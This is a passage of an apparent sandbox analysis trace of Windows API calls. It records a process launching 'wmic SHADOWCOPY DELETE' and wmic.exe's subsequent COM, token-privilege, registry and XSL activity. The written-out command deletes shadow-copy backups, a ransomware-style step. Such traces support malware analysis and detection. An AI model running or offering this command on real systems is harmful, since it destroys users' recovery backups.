SHADOWCOPY DELETE", lpProcessInformation=0x26f400*(hProcess=0x54, hThread=0x50, dwProcessId=0x8bc, dwThreadId=0x41c)) returned 1 [0099.322] CloseHandle (hObject=0x50) returned 1 [0099.322] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0099.322] GetProcessHeap () returned 0x340000 [0099.322] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35c230 | out: hHeap=0x340000) returned 1 [0099.322] GetEnvironmentStringsW () returned 0x35bf20* [0099.322] GetProcessHeap () returned 0x340000 [0099.322] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xae8) returned 0x35ca10 [0099.322] FreeEnvironmentStringsW (penv=0x35bf20) returned 1 [0099.322] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0113.271] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x26f348 | out: lpExitCode=0x26f348*=0x80041002) returned 1 [0113.271] CloseHandle (hObject=0x54) returned 1 [0113.271] _vsnwprintf (in: _Buffer=0x26f5b8, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f358 | out: _Buffer="80041002") returned 8 [0113.271] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="80041002") returned 1 [0113.271] GetProcessHeap () returned 0x340000 [0113.271] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35ca10 | out: hHeap=0x340000) returned 1 [0113.271] GetEnvironmentStringsW () returned 0x35bf20* [0113.271] GetProcessHeap () returned 0x340000 [0113.271] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xb0e) returned 0x35e020 [0113.271] FreeEnvironmentStringsW (penv=0x35bf20) returned 1 [0113.271] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0113.271] GetProcessHeap () returned 0x340000 [0113.271] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35e020 | out: hHeap=0x340000) returned 1 [0113.271] GetEnvironmentStringsW () returned 0x35bf20* [0113.271] GetProcessHeap () returned 0x340000 [0113.272] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xb0e) returned 0x35e020 [0113.272] FreeEnvironmentStringsW (penv=0x35bf20) returned 1 [0113.272] GetProcessHeap () returned 0x340000 [0113.272] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x359e90 | out: hHeap=0x340000) returned 1 [0113.272] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f418 | out: lpAttributeList=0x26f418) [0113.272] _get_osfhandle (_FileHandle=1) returned 0x7 [0113.272] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0113.272] _get_osfhandle (_FileHandle=1) returned 0x7 [0113.272] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4acde194 | out: lpMode=0x4acde194) returned 1 [0113.272] _get_osfhandle (_FileHandle=0) returned 0x3 [0113.272] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4acde198 | out: lpMode=0x4acde198) returned 1 [0113.272] SetConsoleInputExeNameW () returned 0x1 [0113.272] GetConsoleOutputCP () returned 0x1b5 [0113.272] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4acebfe0 | out: lpCPInfo=0x4acebfe0) returned 1 [0113.272] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0113.273] exit (_Code=-2147217406) Process: id = "9" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x6c772000" os_pid = "0x8bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x894" cmd_line = "wmic SHADOWCOPY DELETE" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 31 os_tid = 0x41c [0100.478] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28faf0 | out: lpSystemTimeAsFileTime=0x28faf0*(dwLowDateTime=0x8f8dcdd0, dwHighDateTime=0x1d5956e)) [0100.478] GetCurrentProcessId () returned 0x8bc [0100.478] GetCurrentThreadId () returned 0x41c [0100.478] GetTickCount () returned 0x115317d [0100.478] QueryPerformanceCounter (in: lpPerformanceCount=0x28faf8 | out: lpPerformanceCount=0x28faf8*=22076279161) returned 1 [0100.478] GetModuleHandleW (lpModuleName=0x0) returned 0xff460000 [0100.478] __set_app_type (_Type=0x1) [0100.478] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff4aced0) returned 0x0 [0100.478] __wgetmainargs (in: _Argc=0xff4d2380, _Argv=0xff4d2390, _Env=0xff4d2388, _DoWildCard=0, _StartInfo=0xff4d239c | out: _Argc=0xff4d2380, _Argv=0xff4d2390, _Env=0xff4d2388) returned 0 [0100.559] ??0CHString@@QEAA@XZ () returned 0xff4d2ab0 [0100.671] malloc (_Size=0x30) returned 0x2d5a50 [0100.717] malloc (_Size=0x70) returned 0x2d5a90 [0100.717] malloc (_Size=0x50) returned 0x2d7aa0 [0100.717] malloc (_Size=0x30) returned 0x2d7b00 [0100.717] malloc (_Size=0x48) returned 0x2d7b40 [0100.717] malloc (_Size=0x30) returned 0x2d7b90 [0100.717] malloc (_Size=0x30) returned 0x2d7bd0 [0100.717] ??0CHString@@QEAA@XZ () returned 0xff4d2f58 [0100.717] malloc (_Size=0x30) returned 0x2d7c10 [0100.717] ?Empty@CHString@@QEAAXXZ () returned 0x7fef2dc482c [0100.717] SetConsoleCtrlHandler (HandlerRoutine=0xff4a5724, Add=1) returned 1 [0100.718] _onexit (_Func=0xff4bf378) returned 0xff4bf378 [0100.718] _onexit (_Func=0xff4bf490) returned 0xff4bf490 [0100.718] _onexit (_Func=0xff4bf4d0) returned 0xff4bf4d0 [0100.718] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0100.718] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0100.724] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0100.816] CoCreateInstance (in: rclsid=0xff4673a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff467370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff4d2940 | out: ppv=0xff4d2940*=0x1d71390) returned 0x0 [0101.072] GetCurrentProcess () returned 0xffffffffffffffff [0101.072] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x28f8c0 | out: TokenHandle=0x28f8c0*=0xf4) returned 1 [0101.072] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x28f8b8 | out: TokenInformation=0x0, ReturnLength=0x28f8b8) returned 0 [0101.072] malloc (_Size=0x118) returned 0x2d63e0 [0101.072] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x2d63e0, TokenInformationLength=0x118, ReturnLength=0x28f8b8 | out: TokenInformation=0x2d63e0, ReturnLength=0x28f8b8) returned 1 [0101.072] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x2d63e0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-1927899820, Attributes=0x5d86), (Luid.LowPart=0x0, Luid.HighPart=2981760, Attributes=0x0), (Luid.LowPart=0x6d0061, Luid.HighPart=4587552, Attributes=0x6c0069), (Luid.LowPart=0x43005c, Luid.HighPart=7143535, Attributes=0x6f006d), (Luid.LowPart=0x690046, Luid.HighPart=6619244, Attributes=0x73), (Luid.LowPart=0x6d006d, Luid.HighPart=7209071, Attributes=0x720050))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0101.072] free (_Block=0x2d63e0) [0101.072] CloseHandle (hObject=0xf4) returned 1 [0101.086] malloc (_Size=0x40) returned 0x2d7f80 [0101.087] malloc (_Size=0x40) returned 0x2d63e0 [0101.087] malloc (_Size=0x40) returned 0x2d6430 [0101.087] malloc (_Size=0x20a) returned 0x2d6480 [0101.087] GetSystemDirectoryW (in: lpBuffer=0x2d6480, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0101.087] free (_Block=0x2d6480) [0101.087] malloc (_Size=0x18) returned 0x2edfb0 [0101.087] malloc (_Size=0x18) returned 0x2d6480 [0101.087] malloc (_Size=0x18) returned 0x2d64a0 [0101.087] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0101.087] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0101.087] free (_Block=0x2edfb0) [0101.087] free (_Block=0x2d6480) [0101.087] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x76e30000 [0101.087] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0101.087] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0101.088] FreeLibrary (hLibModule=0x76e30000) returned 1 [0101.088] free (_Block=0x2d64a0) [0101.088] _vsnwprintf (in: _Buffer=0x2d6430, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x28f4e8 | out: _Buffer="ms_409") returned 6 [0101.088] malloc (_Size=0x20) returned 0x2d6480 [0101.088] GetComputerNameW (in: lpBuffer=0x2d6480, nSize=0x28f8c0 | out: lpBuffer="XDUWTFONO", nSize=0x28f8c0) returned 1 [0101.088] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.088] malloc (_Size=0x14) returned 0x2edfb0 [0101.088] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.089] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x28f8b8 | out: lpNameBuffer=0x0, nSize=0x28f8b8) returned 0x7fffffdd000 [0101.089] GetLastError () returned 0xea [0101.089] malloc (_Size=0x40) returned 0x2d64b0 [0101.089] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2d64b0, nSize=0x28f8b8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28f8b8) returned 0x1 [0101.090] lstrlenW (lpString="") returned 0 [0101.090] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.090] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0101.092] lstrlenW (lpString=".") returned 1 [0101.093] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.093] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0101.093] lstrlenW (lpString="LOCALHOST") returned 9 [0101.093] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.093] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0101.093] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.093] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.093] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0101.093] free (_Block=0x2edfb0) [0101.093] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.093] malloc (_Size=0x14) returned 0x2edfb0 [0101.093] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.093] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.093] malloc (_Size=0x14) returned 0x2d6500 [0101.093] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.093] malloc (_Size=0x8) returned 0x2d6520 [0101.093] malloc (_Size=0x18) returned 0x2d6540 [0101.093] malloc (_Size=0x30) returned 0x2d6560 [0101.093] malloc (_Size=0x18) returned 0x2d65a0 [0101.093] SysStringLen (param_1="IDENTIFY") returned 0x8 [0101.093] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0101.093] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0101.093] SysStringLen (param_1="IDENTIFY") returned 0x8 [0101.093] malloc (_Size=0x30) returned 0x2d65c0 [0101.093] malloc (_Size=0x18) returned 0x2d6600 [0101.093] SysStringLen (param_1="IMPERSONATE") returned 0xb [0101.093] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0101.093] SysStringLen (param_1="IMPERSONATE") returned 0xb [0101.093] SysStringLen (param_1="IDENTIFY") returned 0x8 [0101.093] SysStringLen (param_1="IDENTIFY") returned 0x8 [0101.094] SysStringLen (param_1="IMPERSONATE") returned 0xb [0101.094] malloc (_Size=0x30) returned 0x2d6620 [0101.094] malloc (_Size=0x18) returned 0x2d6660 [0101.094] SysStringLen (param_1="DELEGATE") returned 0x8 [0101.094] SysStringLen (param_1="IDENTIFY") returned 0x8 [0101.094] SysStringLen (param_1="DELEGATE") returned 0x8 [0101.094] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0101.094] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0101.094] SysStringLen (param_1="DELEGATE") returned 0x8 [0101.094] malloc (_Size=0x30) returned 0x2d6680 [0101.094] malloc (_Size=0x18) returned 0x2d66c0 [0101.094] malloc (_Size=0x30) returned 0x2d66e0 [0101.094] malloc (_Size=0x18) returned 0x2d6720 [0101.094] SysStringLen (param_1="NONE") returned 0x4 [0101.094] SysStringLen (param_1="DEFAULT") returned 0x7 [0101.094] SysStringLen (param_1="DEFAULT") returned 0x7 [0101.094] SysStringLen (param_1="NONE") returned 0x4 [0101.094] malloc (_Size=0x30) returned 0x2d6740 [0101.094] malloc (_Size=0x18) returned 0x2d6780 [0101.094] SysStringLen (param_1="CONNECT") returned 0x7 [0101.094] SysStringLen (param_1="DEFAULT") returned 0x7 [0101.094] malloc (_Size=0x30) returned 0x2d67a0 [0101.094] malloc (_Size=0x18) returned 0x2d67e0 [0101.094] SysStringLen (param_1="CALL") returned 0x4 [0101.094] SysStringLen (param_1="DEFAULT") returned 0x7 [0101.094] SysStringLen (param_1="CALL") returned 0x4 [0101.094] SysStringLen (param_1="CONNECT") returned 0x7 [0101.094] malloc (_Size=0x30) returned 0x2d6800 [0101.094] malloc (_Size=0x18) returned 0x2d6840 [0101.094] SysStringLen (param_1="PKT") returned 0x3 [0101.094] SysStringLen (param_1="DEFAULT") returned 0x7 [0101.094] SysStringLen (param_1="PKT") returned 0x3 [0101.094] SysStringLen (param_1="NONE") returned 0x4 [0101.094] SysStringLen (param_1="NONE") returned 0x4 [0101.094] SysStringLen (param_1="PKT") returned 0x3 [0101.094] malloc (_Size=0x30) returned 0x2d6860 [0101.094] malloc (_Size=0x18) returned 0x2d68a0 [0101.095] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0101.095] SysStringLen (param_1="DEFAULT") returned 0x7 [0101.095] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0101.095] SysStringLen (param_1="NONE") returned 0x4 [0101.095] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0101.095] SysStringLen (param_1="PKT") returned 0x3 [0101.095] SysStringLen (param_1="PKT") returned 0x3 [0101.095] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0101.095] malloc (_Size=0x30) returned 0x2d8000 [0101.095] malloc (_Size=0x18) returned 0x2d6cc0 [0101.095] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0101.095] SysStringLen (param_1="DEFAULT") returned 0x7 [0101.095] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0101.095] SysStringLen (param_1="PKT") returned 0x3 [0101.095] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0101.095] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0101.095] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0101.095] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0101.095] malloc (_Size=0x30) returned 0x2d8040 [0101.095] malloc (_Size=0x40) returned 0x2d6ce0 [0101.095] malloc (_Size=0x20a) returned 0x2d8fd0 [0101.096] GetSystemDirectoryW (in: lpBuffer=0x2d8fd0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0101.096] free (_Block=0x2d8fd0) [0101.096] malloc (_Size=0x18) returned 0x2d6d30 [0101.096] malloc (_Size=0x18) returned 0x2d6d50 [0101.096] malloc (_Size=0x18) returned 0x2d6d70 [0101.096] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0101.096] SysStringLen (param_1="\\wbem\\") returned 0x6 [0101.096] free (_Block=0x2d6d30) [0101.096] free (_Block=0x2d6d50) [0101.096] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0101.096] free (_Block=0x2d6d70) [0101.096] malloc (_Size=0x18) returned 0x2d6d30 [0101.096] malloc (_Size=0x18) returned 0x2d6d50 [0101.096] malloc (_Size=0x18) returned 0x2d6d70 [0101.096] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0101.096] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0101.096] free (_Block=0x2d6d30) [0101.096] free (_Block=0x2d6d50) [0101.096] GetCurrentThreadId () returned 0x41c [0101.096] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x28f1c0 | out: phkResult=0x28f1c0*=0xf8) returned 0x0 [0101.097] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x28f210, lpcbData=0x28f1b0*=0x400 | out: lpType=0x0, lpData=0x28f210*=0x30, lpcbData=0x28f1b0*=0x4) returned 0x0 [0101.097] _wcsicmp (_String1="0", _String2="1") returned -1 [0101.097] _wcsicmp (_String1="0", _String2="2") returned -2 [0101.097] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x28f1b0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x28f1b0*=0x42) returned 0x0 [0101.097] malloc (_Size=0x86) returned 0x2d6d90 [0101.097] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x2d6d90, lpcbData=0x28f1b0*=0x42 | out: lpType=0x0, lpData=0x2d6d90*=0x25, lpcbData=0x28f1b0*=0x42) returned 0x0 [0101.097] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0101.097] malloc (_Size=0x42) returned 0x2d6e20 [0101.097] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0101.097] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x28f210, lpcbData=0x28f1b0*=0x400 | out: lpType=0x0, lpData=0x28f210*=0x36, lpcbData=0x28f1b0*=0xc) returned 0x0 [0101.097] _wtol (_String="65536") returned 65536 [0101.097] free (_Block=0x2d6d90) [0101.097] RegCloseKey (hKey=0x0) returned 0x6 [0101.097] CoCreateInstance (in: rclsid=0xff467410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff4673f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x28f6b8 | out: ppv=0x28f6b8*=0x22571d0) returned 0x0 [0101.319] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x22571d0, xmlSource=0x28f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x2d6d30), isSuccessful=0x28f870 | out: isSuccessful=0x28f870*=0xffff) returned 0x0 [0104.718] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x22571d0, DOMElement=0x28f6b0 | out: DOMElement=0x28f6b0*=0x225bc50) returned 0x0 [0104.719] malloc (_Size=0x18) returned 0x2d6d30 [0104.719] IXMLDOMElement:getElementsByTagName (in: This=0x225bc50, tagName="XSLFORMAT", resultList=0x28f6c0 | out: resultList=0x28f6c0*=0x2259cc0) returned 0x0 [0104.722] free (_Block=0x2d6d30) [0104.722] IXMLDOMNodeList:get_length (in: This=0x2259cc0, listLength=0x28f888 | out: listLength=0x28f888*=21) returned 0x0 [0104.725] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=0, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.725] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="texttable.xsl") returned 0x0 [0104.725] IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.725] malloc (_Size=0x18) returned 0x2d6d30 [0104.725] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.725] free (_Block=0x2d6d30) [0104.725] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0 [0104.725] malloc (_Size=0x18) returned 0x2d6d30 [0104.725] malloc (_Size=0x18) returned 0x2d6d50 [0104.725] malloc (_Size=0x30) returned 0x2d8080 [0104.726] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.726] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.726] IUnknown:Release (This=0x225a280) returned 0x0 [0104.726] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=1, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.726] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="textvaluelist.xsl") returned 0x0 [0104.726] IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.726] malloc (_Size=0x18) returned 0x2d6e70 [0104.726] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.726] free (_Block=0x2d6e70) [0104.726] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0 [0104.726] malloc (_Size=0x18) returned 0x2dc270 [0104.726] malloc (_Size=0x18) returned 0x2dc290 [0104.726] SysStringLen (param_1="VALUE") returned 0x5 [0104.726] SysStringLen (param_1="TABLE") returned 0x5 [0104.726] SysStringLen (param_1="TABLE") returned 0x5 [0104.726] SysStringLen (param_1="VALUE") returned 0x5 [0104.726] malloc (_Size=0x30) returned 0x2d80c0 [0104.726] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.726] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.726] IUnknown:Release (This=0x225a280) returned 0x0 [0104.726] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=2, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.726] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="textvaluelist.xsl") returned 0x0 [0104.726] IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.727] malloc (_Size=0x18) returned 0x2dc2b0 [0104.727] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.727] free (_Block=0x2dc2b0) [0104.727] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x4)) returned 0x0 [0104.727] malloc (_Size=0x18) returned 0x2dc2b0 [0104.727] malloc (_Size=0x18) returned 0x2dc2d0 [0104.727] SysStringLen (param_1="LIST") returned 0x4 [0104.727] SysStringLen (param_1="TABLE") returned 0x5 [0104.727] malloc (_Size=0x30) returned 0x2d8100 [0104.727] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.727] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.727] IUnknown:Release (This=0x225a280) returned 0x0 [0104.727] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=3, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.727] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="rawxml.xsl") returned 0x0 [0104.727] IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.727] malloc (_Size=0x18) returned 0x2dc2f0 [0104.727] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.727] free (_Block=0x2dc2f0) [0104.727] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0 [0104.727] malloc (_Size=0x18) returned 0x2dc2f0 [0104.727] malloc (_Size=0x18) returned 0x2dc310 [0104.727] SysStringLen (param_1="RAWXML") returned 0x6 [0104.727] SysStringLen (param_1="TABLE") returned 0x5 [0104.727] SysStringLen (param_1="RAWXML") returned 0x6 [0104.728] SysStringLen (param_1="LIST") returned 0x4 [0104.728] SysStringLen (param_1="LIST") returned 0x4 [0104.728] SysStringLen (param_1="RAWXML") returned 0x6 [0104.728] malloc (_Size=0x30) returned 0x2d8140 [0104.728] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.728] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.728] IUnknown:Release (This=0x225a280) returned 0x0 [0104.728] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=4, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.728] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="htable.xsl") returned 0x0 [0104.728] IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.728] malloc (_Size=0x18) returned 0x2dc330 [0104.728] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.728] free (_Block=0x2dc330) [0104.728] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: 